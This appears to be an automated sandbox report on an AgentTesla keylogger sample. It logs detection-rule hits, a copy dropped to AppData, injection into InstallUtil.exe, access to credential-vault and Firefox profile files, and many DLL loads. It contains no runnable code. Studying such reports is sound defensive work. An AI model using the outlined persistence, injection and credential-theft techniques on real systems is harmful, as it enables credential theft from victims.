                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 2.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 2.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@5/2
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeFile created: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                      Source: Teklif-6205018797-6100052155-UUE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Teklif-6205018797-6100052155-UUE.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Teklif-6205018797-6100052155-UUE.exeReversingLabs: Detection: 50%
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeFile read: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe "C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe"
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe "C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe "C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe"
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
